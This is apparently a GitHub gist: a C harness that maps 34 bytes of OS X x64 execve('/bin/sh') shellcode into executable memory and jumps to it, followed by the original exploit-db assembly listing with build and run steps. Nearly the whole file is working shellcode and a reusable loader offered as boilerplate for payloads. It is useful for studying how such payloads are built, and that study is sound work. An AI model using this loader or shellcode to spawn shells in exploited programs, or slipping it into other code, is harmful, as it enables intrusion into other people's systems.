
@wtfbbqhax
Created September 14, 2016 12:45
Beauty and the Bin/sh
// * .,.. _ _ _
// ` ,:':::` | | (_) | |
// :: ::::=. . | |__ _ _ __ ___| |__ ___
// \.:|| .::::| :: | '_ \| | '_ \ / __| '_ \ / __|
// /_.|| .:::::u::: * | |_) | | | | |\__ \ | | || (__
// .- ||______:::: . |_.__/|_|_| |_||___/_| |_(_)___|
// '-------::'
// \_\= /'::.':'
// ///_ - --_ Victor Roemer (wtfbbqhax), <victor@badsec.org>.
///._\=---- Wrote sometime between 2014-2015
//
// Original shellcode was obtained from exploit-db.com, can be seen in the
// comment block following main().
/* Q: Is it the last shellcode boiler-plate you'll ever use again?? */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
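typedef void (*Func_t)(void);
typedef char const ByteCode[];
#define PROT_RWX (PROT_READ|PROT_WRITE|PROT_EXEC) /* kept for compatibility; _NewFunc no longer maps RWX */
#define PROT_RW  (PROT_READ|PROT_WRITE)
#define PROT_RX  (PROT_READ|PROT_EXEC)
#define MAP_MINE (MAP_ANON|MAP_PRIVATE)

// Copy `size` bytes of machine code into a fresh anonymous mapping and hand
// it back as a callable function pointer.
//
// The region is mapped read/write for the copy and only then flipped to
// read/execute, so a simultaneously writable and executable (RWX) page never
// exists.  RWX mappings violate W^X and are refused outright on hardened
// systems, which made the original single-step RWX mmap() fail there; the
// RW-then-RX sequence is the conventional pattern for code generated at
// run time.
//
// Returns NULL if mmap() or mprotect() fails, with errno left as set by the
// failing call (a size of 0 makes mmap() fail with EINVAL).  On success the
// mapping is owned by the caller and is never unmapped here.
Func_t _NewFunc (ByteCode code, size_t size)
{
    void *region = mmap(NULL, size, PROT_RW, MAP_MINE, -1, 0);
    if (region == MAP_FAILED)
        return NULL;

    memcpy(region, code, size);

    if (mprotect(region, size, PROT_RX) != 0) {
        int saved_errno = errno;  // munmap() may overwrite errno
        munmap(region, size);
        errno = saved_errno;
        return NULL;
    }
    return (Func_t)region;
}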
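// Map a byte array into executable memory.  `code` must be an actual array
// (not a pointer) so that sizeof() yields its length.  The expansion carries
// no trailing semicolon: the original `...;` made every use expand to `;;`,
// which turns `if (c) p = NewFunc(x); else ...` into a syntax error.
#define NewFunc(code) _NewFunc((code), sizeof(code))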
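// Entry point: map the payload bytes into executable memory and jump to
// them.  Returns 1 (after perror) if the mapping could not be created; the
// original unconditionally called through a possibly-NULL pointer.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    // Opcode bytes transcribed from the original author's listing in the
    // comment block that follows main() (OS X x64 /bin/sh, 34 bytes).
    ByteCode shellcode = {
        0x48, 0x31, 0xf6, 0x56, 0x48, 0xbf, 0x2f, 0x2f,
        0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x57, 0x48,
        0x89, 0xe7, 0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0,
        0xb0, 0x02, 0x48, 0xc1, 0xc8, 0x28, 0xb0, 0x3b,
        0x0f, 0x05
    };

    Func_t binsh = NewFunc(shellcode);
    if (binsh == NULL) {
        perror("NewFunc");
        return 1;
    }

    // Per the listing below the payload ends in an execve() syscall, so on
    // success this call is not expected to return.
    binsh();
    return 0;
}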
//////////////////////////////////////////// Original Shellcode //////////////
/*
[*] Author: Csaba Fitzl, @theevilbit
[*] Tested on OS X 10.10.5
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
[*] Assembly version
[*] binsh-shellcode.asm
[*] ./nasm -f macho64 binsh-shellcode.asm
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o
-------------------------------------------------------------------------------
BITS 64
global start
section .text
start:
xor rsi,rsi ;zero out RSI
push rsi ;push NULL on stack
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
push rdi ;push rdi to the stack
mov rdi, rsp ;store RSP (points to the command string) in RDI
xor rdx, rdx ;zero out RDX
;store syscall number on RAX
xor rax,rax ;zero out RAX
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
mov al,0x3b ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b
syscall ;trigger syscall
-------------------------------------------------------------------------------
[*] C version
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
[*] binsh-shellcode.c
[*] Compile: gcc binsh-shellcode.c -o sc
[*] Run: ./sc
*/